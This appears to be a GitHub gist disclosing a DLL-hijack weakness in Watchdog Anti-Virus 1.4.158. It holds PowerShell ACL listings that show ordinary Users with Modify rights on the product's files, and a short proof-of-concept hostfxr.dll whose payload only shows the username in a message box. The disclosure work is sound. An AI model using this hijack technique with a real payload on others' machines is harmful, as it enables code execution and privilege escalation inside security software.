Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;OICIID;0x1301bf;;;BU)(A;ID;FA;;;S-1-5-80-956008885-3
418522649-1831038044-1853292631-2271478464)(A;CIIOID;GA;;;S-1-5-80-956008885-3418522649-1831038044-1853292631-
2271478464)(A;ID;FA;;;SY)(A;OICIIOID;GA;;;SY)(A;ID;FA;;;BA)(A;OICIIOID;GA;;;BA)(A;OICIIOID;GXGR;;;BU)(A;OICIIO
ID;GA;;;CO)(A;ID;0x1200a9;;;AC)(A;OICIIOID;GXGR;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)(A;OICIIOID;GXGR;;;S-1-15-2-2
)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog
Anti-Virus\.sentry-native\b78311f7-70d6-4ba6-3e3c-6fcc6b771e67.run
Owner : DESKTOP-8B89BFF\dev
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT SERVICE\TrustedInstaller Allow FullControl
NT SERVICE\TrustedInstaller Allow 268435456
NT AUTHORITY\SYSTEM Allow FullControl
NT AUTHORITY\SYSTEM Allow 268435456
BUILTIN\Administrators Allow FullControl
BUILTIN\Administrators Allow 268435456
BUILTIN\Users Allow -1610612736
DESKTOP-8B89BFF\dev Allow FullControl
CREATOR OWNER Allow 268435456
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow -1610612736
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow -1610612736
Audit :
Sddl : O:S-1-5-21-2015969053-4181822921-3402349266-1000G:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;OICIID;0
x1301bf;;;BU)(A;ID;FA;;;S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464)(A;CIIOID;GA;;;S-1-5-80
-956008885-3418522649-1831038044-1853292631-2271478464)(A;ID;FA;;;SY)(A;OICIIOID;GA;;;SY)(A;ID;FA;;;BA)(A;OICI
IOID;GA;;;BA)(A;OICIIOID;GXGR;;;BU)(A;ID;FA;;;S-1-5-21-2015969053-4181822921-3402349266-1000)(A;OICIIOID;GA;;;
CO)(A;ID;0x1200a9;;;AC)(A;OICIIOID;GXGR;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)(A;OICIIOID;GXGR;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\.sentry-native\reports
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT SERVICE\TrustedInstaller Allow FullControl
NT SERVICE\TrustedInstaller Allow 268435456
NT AUTHORITY\SYSTEM Allow FullControl
NT AUTHORITY\SYSTEM Allow 268435456
BUILTIN\Administrators Allow FullControl
BUILTIN\Administrators Allow 268435456
BUILTIN\Users Allow -1610612736
CREATOR OWNER Allow 268435456
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow -1610612736
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow -1610612736
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;OICIID;0x1301bf;;;BU)(A;ID;FA;;;S-1-5-80-956008885-3
418522649-1831038044-1853292631-2271478464)(A;CIIOID;GA;;;S-1-5-80-956008885-3418522649-1831038044-1853292631-
2271478464)(A;ID;FA;;;SY)(A;OICIIOID;GA;;;SY)(A;ID;FA;;;BA)(A;OICIIOID;GA;;;BA)(A;OICIIOID;GXGR;;;BU)(A;OICIIO
ID;GA;;;CO)(A;ID;0x1200a9;;;AC)(A;OICIIOID;GXGR;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)(A;OICIIOID;GXGR;;;S-1-15-2-2
)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog
Anti-Virus\.sentry-native\b78311f7-70d6-4ba6-3e3c-6fcc6b771e67.run.lock
Owner : DESKTOP-8B89BFF\dev
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
DESKTOP-8B89BFF\dev Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:S-1-5-21-2015969053-4181822921-3402349266-1000G:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x130
1bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-2015969053-4181822921-3402349266-1000)(A;ID;0x1200a9;
;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\.sentry-native\metadata
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\.sentry-native\settings.dat
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog
Anti-Virus\.sentry-native\b78311f7-70d6-4ba6-3e3c-6fcc6b771e67.run\session.json
Owner : DESKTOP-8B89BFF\dev
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
DESKTOP-8B89BFF\dev Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:S-1-5-21-2015969053-4181822921-3402349266-1000G:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x130
1bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-2015969053-4181822921-3402349266-1000)(A;ID;0x1200a9;
;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog
Anti-Virus\.sentry-native\b78311f7-70d6-4ba6-3e3c-6fcc6b771e67.run\__sentry-breadcrumb1
Owner : DESKTOP-8B89BFF\dev
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
DESKTOP-8B89BFF\dev Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:S-1-5-21-2015969053-4181822921-3402349266-1000G:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x130
1bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-2015969053-4181822921-3402349266-1000)(A;ID;0x1200a9;
;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog
Anti-Virus\.sentry-native\b78311f7-70d6-4ba6-3e3c-6fcc6b771e67.run\__sentry-breadcrumb2
Owner : DESKTOP-8B89BFF\dev
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
DESKTOP-8B89BFF\dev Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:S-1-5-21-2015969053-4181822921-3402349266-1000G:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x130
1bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-2015969053-4181822921-3402349266-1000)(A;ID;0x1200a9;
;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog
Anti-Virus\.sentry-native\b78311f7-70d6-4ba6-3e3c-6fcc6b771e67.run\__sentry-event
Owner : DESKTOP-8B89BFF\dev
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
DESKTOP-8B89BFF\dev Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:S-1-5-21-2015969053-4181822921-3402349266-1000G:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x130
1bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-2015969053-4181822921-3402349266-1000)(A;ID;0x1200a9;
;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\DefaultDatabases\wsdk.fp
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\DefaultDatabases\wsdk.hdb
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\COPYING.txt
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\json-c.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\libbz2.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\libclamav.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\libclamunrar.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog
Anti-Virus\scanner1\libclamunrar_iface.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog
Anti-Virus\scanner1\libcrypto-1_1-x64.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\libcurl.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\libfreshclam.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\libssh2.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\libssl-1_1-x64.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\libxml2.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\mspack.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\nghttp2.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\pcre2-8.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\pdcurses.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\pthreadVC2.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Raw
main.c
#include "windows.h"
/**
*
* hostfxr.dll hijack PoC for Watchdog Anti-Virus version 1.4.158
*
* x86_64-w64-mingw32-g++ -masm=intel -s -w -static -shared -Wno-multichar -o hostfxr.dll main.c
*
* */
#define DllImport __declspec( dllimport )
#define DllExport __declspec( dllexport )
DllExport void hostfxr_main_startupinfo() {
wchar_t username[100];
DWORD username_len = 100;
GetUserNameW(username, &username_len);
MessageBoxW(NULL, username, L"TEST", MB_OK | MB_ICONERROR);
}
BOOL WINAPI DllMain(
IN HINSTANCE hinstDLL,
IN DWORD fdwReason,
IN LPVOID lpvReserved
)
{
switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
hostfxr_main_startupinfo();
break;
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment